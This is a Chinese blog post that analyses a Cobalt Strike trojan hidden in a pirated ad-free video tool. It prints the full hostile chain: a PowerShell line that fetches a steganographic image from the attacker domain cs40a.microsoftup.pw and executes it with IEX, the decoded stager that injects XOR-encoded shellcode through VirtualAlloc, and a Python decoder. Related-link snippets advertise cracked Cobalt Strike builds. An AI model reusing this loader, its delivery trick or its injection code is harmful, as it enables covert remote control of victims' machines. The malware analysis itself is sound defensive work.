Cobalt Strike远控木马分析

最新推荐文章于 2024-05-26 20:23:09 发布
最新推荐文章于 2024-05-26 20:23:09 发布
阅读量1.5w 收藏 9
点赞数 2
分类专栏: Windows
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/109211337
版权

简介

Cobalt Strike目前已经很流行, 其生成的木马在很多地方也可以找到, 这里通过网上发布的一个aqy的免广告的工具中带的木马进行分析学习…

过程

找到可疑文件

这里通过Exeinfo.exe工具, 发现可疑DLL, 文件被vmp 2.07加了壳, 很明显一般的dll不会加这种壳:
vmp

行为分析

通过OD我们进行调试, 发现此dll的主要功能是调用当前目录下的powershell脚本dataup.ps1:
od
查看此dataup.ps1, 代码如下:

sal a New-Object;Add-Type -A System.Drawing;
$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://cs40a.microsoftup.pw/down/test22a.png"));
$o=a Byte[] 5220;
(0..2)|%{
foreach($x in(0..1739))
	{
		$p=$g.GetPixel($x,$_);$o[$_*1740+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))
	}
};
IEX([System.Text.Encoding]::ASCII.GetString($o[0..3546])

通过隐写的方式将代码, 放到远程图片中, 然后现在下载解密在内存中运行, 其中的图片原图就是下面这个:
在这里插入图片描述
我们通过修改代码:

sal a New-Object;Add-Type -A System.Drawing;
$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("https://img-blog.csdnimg.cn/20201021221709565.png"));
$o=a Byte[] 5220;
(0..2)|%{foreach($x in(0..1739))
    {
        $p=$g.GetPixel($x,$_);
        $o[$_*1740+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))
    }
};
[System.Text.Encoding]::ASCII.GetString($o[0..3546])

得到解密出来的代码:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Locatio
n.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string
'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((
New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelega
te')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateT
ype', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_p
arameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementa
tionFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfI
vOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVE
pNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktEMiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pa
m4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMcW1TbyM/KTC5PlPSyMYeofWfxCVw
fxq0qeMGFAGThhaZMWd+s04FT7ssbCApWOQQzCChcK4jXjLCPljuiw6F79G9iFaPNrwyzWwKZfIiI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANuc
GpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNExgDYlVCTVcDYVFMVFBGUQouKSN9E3rFdD//yimfBvF0/1H0qDz+p23vSvtX/IoZccpbpec3qr
YAxlh7ouQyxEuWnwnpNx4pZs7AdjumuryMXWFdP189564fQ1N6qEK2OEWbyM+kYhZIE4Rry/jqxMkB+TUheDJp5Anw+TMVGxxEZ1VGHMnrswvH1tn3pGo6j8kdfP9j3X4
+0YWJ7nj3jtebI1/yGvKdbvs/FzlsrIfIyjxUkDHAnHrj/M/MrkDsEe8XPmpfO9eTz8N/1Kc98/6Kym/wSkQEf+PjxASJmCNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG
3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcQFAXE0INTkpAUUxQTEVXVlMNU1QjMRd1Ww==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAllo
c), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntP
tr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

is

这又是一段加密的代码, 主要功能是将上面代码的base64部分解密, 然后与35进行异或得到一段shellcode:
解密脚本:

import base64
bcode = "38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktEMiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMe2FVbyPLm/M0T+9tiKiKeUGHZ8xtXX2ewq1PsRjmHxmKhrOBUMPrTQ8BzQXEcv96L0tUOUpZCXgC0KayN2Lt2wT5YLEtVDGGucs97+vRI3ZQRlEOYkRGTVcZA25MWUpPT0IMFw0TAwtATE5TQldKQU9GGANucGpmAxQNExgDdEpNR0xUUANtdwMWDRIYAw1tZncDYG9xAxENEw0WExQRFBgDDW1mdwNgb3EDEA0TDRMXFhMVDRATCi4pIw6UpTF1OBjAlT8DAB47//CyyzTsM+BmHocgmMR7DKE52SkaR+G2JTwk5zpgMV8GbPLeYNUr41CiqiJ2BsyQPAnVxMmQc3UhdPWqfNTLumBPH3OZgV72d94bYT6NEM2kQCtOIqSmcbULbvcpieEKbW5yEHfbGZXFK7v9qVsMQg1jjrx+76WkbIQNFQ1cyztF+kgQ8MACW1tZtz18nWGgA6IMlANij8b0bHH33qBDH0CU875iMbLzmdJdLzxfR5++gwkaDiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcQFAXE0INTkpAUUxQTEVXVlMNU1QjMRd1Ww=="
decode = base64.b64decode(bcode)
data = []
for i in decode:   
    data.append(i^35)
data = bytes(data)
# print(data)
fd = open("/home/sir/desktop/样本/shell", "bw")
code = fd.write(data)
fd.close()

shellcode
然后将这段shellcode复制到OD中进行调试:
shell
shellcode的API调用方式, 就是Cobalt Strike木马的一个动态特征, 主要功能就是shellcode会去cs40a.microsoftup.pw请求获取Beacon核心DLL进行内存解密加载;
提取出核心dll后, 可以通过在线工具解密出Cobalt Strike的配置信息:
tool

总结

这种木马的调用过程很长麻烦, 但是基本的代码仍然是通过Cobalt Strike生成的, 所以通过调试就会发现特征性还是比较强的, 虽然调用比较隐蔽, 但是程序从出现的一些URL很容易就会被溯源分析出来的…

钞sir
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CobaltStrike上线Linux主机(CrossC2)
谢公子的博客
05-30 6956
在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢? 在上一篇文章中我提到了,CobaltStrike自身上线Linux主机的情况,需要知道对方Linux主机的账号密码或SSH秘钥,并且还需要获取一台其他机器权限作为中继。本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell。 ...
CobaltStrike4.4.zip
09-15
在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关的文件,它们在网络安全测试和防御演练中扮演着重要角色。 首先,`agscript`可能是指Cobalt Strike的Aggressor Script,这是一种...
Cobalt Strike渗透神器详解
读书 买花 长大
06-27 2309
cobalt strike
一次偶然的CobaltStrike木马钓鱼邮件分析
博客地址 www.sec0nd.top
08-02 2108
前几天看到一篇关于近期钓鱼邮件的情况统计的文章,挺有意思然后在逛某威胁感知社区的时候,看到了一个恶意url,也挺有意思子域名伪装成某安全公司hhh,然后看了下与之有关的通信样本好家伙全是钓鱼文件,免杀做的还不错,最近几天不知道为什么异常频繁于是就点进去几个看了看,分析分析这种是怎么实现cs上线的(纯小白,勿喷) 下面所有分析均为在线沙箱进行测试的结果。......
渗透工具CobaltStrike工具的下载和安装
最新发布
繁星
05-26 1728
Cobalt Strike(简称为CS)是一款基于java的渗透测试工具,专业的团队作战的渗透测试工具。CS使用了C/S架构,它分为客户端(Client)和服务端(Server),服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell。cs的主要功能是在已经取得攻击目标的控制权后,用于持久化、横向移动、流量隐藏以及数据窃取等操作。
Cobalt Strike之HTA木马
浅笑996的博客
11-15 2150
点击 attacks --> packages --> HTML Application 弹出的对话框method选择powershell (不要选第一个,不太兼容)点击确定 测试运行
反沙箱CobaltStrike木马加载器分析
墨痕诉清风的博客
06-13 1627
1.计算Sleep类函数延时时间与实际流逝时间是否匹配可判断环境是否为正常。对沙箱来说,跳过Sleep节约时间成本是有必要的不可省去,但可适当处理GetTickCount类函数,使其与延时时间匹配。2.对于动态解密,打好断点动态分析比静态分析省时间,至少对我这种刚上路的菜狗来说是这样。3.CertEnumSystemStore可作为CertEnumSystemStore替代品用于执行Shellcode。近日,笔者参加了浙江护网,在攻击队停止攻击的那一天凌晨,Windows服务器被攻破大量失分,早晨溯源时拿到
CobaltStrike4.0 远控分析
mai1zhi2的博客
12-25 1181
1. 概述 Cobalt Strike是渗透测试神器,其功能简介就不用多说了,其4.0版本更新已有一段时间了,这里献丑分析一下,若有错误的地方望大伙指出,谢谢。 2. 样本信息 样本名 artifact4.exe 样本大小 14,336 字节 MD5 9ff9170e001f5619a0be11516051f538 SHA1 b824ed85d7dbe14f193f70d328d061e90c760736 3. 实验环境...
CobaltStrike windows木马原理分析
好好学习,天天向上
12-28 1253
本文主要介绍CobaltStrike windows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CS4.4远控工具CobaltStrike4.4
08-23
CS4.4远控工具CobaltStrike4.4,仅供测试学习使用,请不要从事非法活动。
cobalt strike 4.7
06-07
Cobalt Strike 4.7 是一款广泛应用在网络安全领域的高级渗透测试工具,它主要用于模拟攻击者行为,评估组织的安全防御能力。C2(Command and Control)工具是指远程控制服务器,Cobalt Strike 在此领域中扮演了核心...
CobaltStrike4.1
03-10
Cobalt Strike是一款广泛应用于网络安全领域,特别是红队操作、渗透测试和安全研究的专业工具。它的最新版本Cobalt Strike 4.1引入了多项改进和新特性,旨在提升安全专家进行模拟攻击、网络侦察以及漏洞利用的能力。...
cobaltstrike4.0
06-26
Cobalt Strike是一款备受安全专业人士青睐的高级渗透测试工具,尤其在红队操作和网络防御模拟方面具有广泛的应用。Cobalt Strike 4.0版本的发布带来了许多更新和改进,旨在提高攻击者模拟的效率和真实性,同时帮助...
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
Cobalt Strike之LINK木马
浅笑996的博客
11-15 1292
在同一目录下 新建一个exp.ps1 一个test.txt exp.ps1代码 $file = Get-Content "test.txt" $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("test.lnk") $Shortcut.TargetPath = "%System...
利用Cobalt Strike通过exe木马实现远控|Cobalt Strike远程控制|Cobalt Strike 使用方法|CS使用方法
热门推荐
VI___
02-29 1万+
一、下载“CS-闪电攻击” 百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4HsSQ,提取码:fdvb CS分为两部分:客户端、服务端,CS 依赖 Java 1.8,所以运行CS程序前自行安装java,windows 和 kali 都装上吧,kali自带的openjdk也能用。 二、攻击 1、将cobalt Strike复制到 ...
Cobaltstrike系列(一)-- 远程控制
weixin_41489908的博客
02-07 3501
前天和爸爸在晒太阳,爸爸突然说了句:感觉怎么样,社会不好闯吧,如果太累的话就缓缓,老子给你撑一下。听到这里的时候我突然就嚎啕大哭了,想起自己这些年来,再看看父亲头上的白发,我突然发现自己还不够拼。。。 一、通过cmd窗口运行teamserver,后面加上目标ip 用户名 二、双击运行cobaltstrike.bat 三、输入用户名和密码登录 四、设置监听器,点击菜单栏cobalt strik...
cobaltstrike远控木马
09-03
Cobalt Strike是一种常用的远控木马工具。通过该工具,攻击者可以在受害者电脑上执行命令、控制靶机等操作。要执行命令,需要使用Cobalt Strike的交互界面,在界面的底部的beacon输入框中输入相应的命令,比如"shell calc.exe"可以在受害者电脑上打开计算器,"help"可以获取帮助信息。此外,通过右键可以访问常用的攻击工具,用来控制靶机。 为了使用Cobalt Strike,首先需要将其复制到Kali系统中,并在目录下执行相应的命令,打开Cobalt Strike客户端。在客户端中,需要输入IP、端口、密码进行连接,用户名可以随意填写。成功连接后,便可以进行相应的操作了。 Cobalt Strike分为两个部分,即客户端和服务端。在运行Cobalt Strike之前,请确保已安装Java 1.8,无论是在Windows还是Kali系统中都需要安装Java。Kali系统自带的openjdk也可以使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [利用Cobalt Strike通过exe木马实现远控|Cobalt Strike远程控制|Cobalt Strike 使用方法|CS使用方法](https://blog.csdn.net/Cody_Ren/article/details/104578101)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值